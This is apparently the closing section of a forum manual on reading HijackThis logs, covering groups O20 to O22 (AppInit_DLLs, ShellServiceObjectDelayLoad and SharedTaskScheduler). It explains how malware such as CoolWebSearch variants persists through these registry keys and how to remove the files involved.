The AppInit_DLLs registry value contains a list of DLLs (libraries) to be loaded whenever user32.dll is loaded. Many Windows executables use the user32.dll library, which means that any DLL listed in the AppInit_DLLs value will be loaded into them as well. This makes it very difficult to remove, because the DLL is loaded into many processes, many of which cannot be stopped without causing system instability. user32.dll is also used by the processes the system starts automatically when you log in. This means that the files listed in the AppInit_DLLs value are loaded very early in the Windows startup routine, allowing the DLL to hide or protect itself before we have access to the system.
This method is known to be used by a variant of CoolWebSearch and can only be seen in Regedit by right-clicking the value and selecting Modify Binary Data. Registrar Lite, on the other hand, can show this DLL more easily.
Code:
Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
Code:
Sample List O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll
There are very few legitimate programs that use this registry value, but you must still proceed with caution when deciding to delete the files listed here. Use Google or a list (the Bleeping Computer startup list) as a reference to investigate whether the files are legitimate or not.
When you fix these entries, HijackThis will try to delete the listed file. Sometimes the file may be in use. If the file is still not removed, boot into safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O21.
This group is for files that are loaded through the ShellServiceObjectDelayLoad registry key.
This key contains values similar to those of the Run registry key. The difference is that instead of pointing to the file itself, it points to a CLSID whose InProcServer32 value contains the information about the particular DLL being used.
Files under this key are loaded automatically by Explorer.exe when your computer starts. Because Explorer.exe is the shell of your computer, it is always loaded, and so the files under this key are loaded too. These files are therefore loaded early in the startup process, before any human intervention.
A hijacker using this method can be recognized by entries like the following:
Code:
Sample List: R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = C:\WINDOWS\secure.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Default_Page_URL=C:\WINDOWS\secure.html
Code:
Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
Code:
Sample List O21 - SSODL: System - - C:\WINDOWS\system32\system32.dll
HijackThis has an internal database that recognizes the legitimate uses of this key and does not list them in the log, so any O21 entry you do see can be considered suspicious.
You can use Google to check on this DLL, or this list of DLLs:
List of group O21 DLLs at Bleeping Computer.
When you fix these entries, HijackThis will try to delete the listed file. Sometimes the file may be in use. If the file is still not removed, boot into safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O22.
This group is for files that are loaded through the SharedTaskScheduler registry key.
Entries in this registry key run automatically when Windows starts. To date only CWS.Smartfinder uses this key.
Registry key:
Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
Code:
Sample List O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll
HijackThis deletes the value associated with this SharedTaskScheduler entry, but it does not erase the CLSID it points to, nor the file that the CLSID's InprocServer32 points to. Therefore, as in the previous groups, you must boot into safe mode and delete it manually, using Unlocker or a similar program.
Here ends the manual; I hope it is useful to everyone.
Any suggestion is more than welcome!